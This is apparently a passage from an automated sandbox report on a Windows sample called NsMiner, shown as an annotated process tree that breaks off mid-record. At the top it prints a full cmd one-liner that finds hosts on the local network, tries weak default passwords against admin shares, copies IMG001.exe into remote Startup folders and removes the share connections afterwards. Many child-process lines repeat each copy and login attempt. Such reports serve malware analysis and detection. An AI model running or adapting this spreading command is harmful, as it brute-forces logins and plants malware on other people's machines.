        "C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=1808& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))
        5⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:4824
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"
        6⤵
        Network Service Discovery
        
        PID:7216
        
        C:\Windows\SysWOW64\net.exe
        
        net view
        7⤵
        Discovers systems in the same network
        
        PID:4932
        
        C:\Windows\SysWOW64\find.exe
        
        find /i "\\"
        7⤵
        
        PID:4220
        
        C:\Windows\SysWOW64\ARP.EXE
        
        arp -a
        7⤵
        Network Service Discovery
        
        PID:3608
        
        C:\Windows\SysWOW64\find.exe
        
        find /i " 1"
        7⤵
        
        PID:7476
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c set str_
        6⤵
        
        PID:7292
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net view \\10.127.255.255|find /i " "
        6⤵
        
        PID:3396
        
        C:\Windows\SysWOW64\net.exe
        
        net view \\10.127.255.255
        7⤵
        Discovers systems in the same network
        
        PID:5084
        
        C:\Windows\SysWOW64\find.exe
        
        find /i " "
        7⤵
        
        PID:7688
      - C:\Windows\SysWOW64\net.exe
        
        net use * /delete /y
        6⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:5664
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:7144
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:1376
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:1644
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:7728
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:8056
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:4324
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5792
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6920
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:900
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:1864
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:1096
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:944
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:2292
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7188
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5336
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:3608
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5900
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:700
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:1604
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7852
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:4660
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:7368
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5616
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:6064
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:6060
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7920
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:5244
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:7340
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:3612
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7436
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:4300
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6664
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7960
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5764
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6464
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\1\IMG001.exe" "
        6⤵
        
        PID:7576
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\IMG001.exe"
        7⤵
        
        PID:7064
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ /delete /y
        6⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:8168
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 20 localhost
        6⤵
        Runs ping.exe
        
        PID:6580
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:2868
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5964
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6040
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:1208
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:968
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6744
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:2508
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5672
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:7164
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:1476
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:1524
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:648
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:2016
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:3124
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5460
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:3752
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7148
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:7984
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5324
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:3924
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:2228
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:4808
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:7728
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:4536
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:1096
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:1580
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:488
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6620
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:8020
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:1660
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6596
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:6820
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6124
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6312
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\1\IMG001.exe" "
        6⤵
        
        PID:7644
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\IMG001.exe"
        7⤵
        
        PID:5620
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users /delete /y
        6⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:4324
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 20 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:7584
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:6408
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1" /user:"1"
        6⤵
        
        PID:6476
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1" /user:"1"
        6⤵
        
        PID:6756
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6888
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "123" /user:"1"
        6⤵
        
        PID:704
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "123" /user:"1"
        6⤵
        
        PID:7416
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:2888
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1" /user:"1"
        6⤵
        
        PID:6724
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1" /user:"1"
        6⤵
        
        PID:5296
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5796
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1808" /user:"1"
        6⤵
        
        PID:7508
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1808" /user:"1"
        6⤵
        
        PID:6236
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:2372
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ """" /user:"1"
        6⤵
        
        PID:5368
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users """" /user:"1"
        6⤵
        
        PID:3192
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:5356
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "0" /user:"10.127.255.255"
        6⤵
        
        PID:7560
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "0" /user:"10.127.255.255"
        6⤵
        
        PID:8164
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:3436
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1" /user:"10.127.255.255"
        6⤵
        
        PID:7420
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1" /user:"10.127.255.255"
        6⤵
        
        PID:804
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:8132
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "123" /user:"10.127.255.255"
        6⤵
        
        PID:4088
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "123" /user:"10.127.255.255"
        6⤵
        
        PID:7964
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:436
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "10.127.255.255" /user:"10.127.255.255"
        6⤵
        
        PID:4720
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "10.127.255.255" /user:"10.127.255.255"
        6⤵
        
        PID:2772
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:4232
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1808" /user:"10.127.255.255"
        6⤵
        
        PID:5728
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1808" /user:"10.127.255.255"
        6⤵
        
        PID:5028
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1808
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ """" /user:"10.127.255.255"
        6⤵
        
        PID:3112
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users """" /user:"10.127.255.255"
        6⤵
        
        PID:2524
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:8016
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "0" /user:"administrator"
        6⤵
        
        PID:5936
      - C:\Windows\SysWOW64\net.exe
        
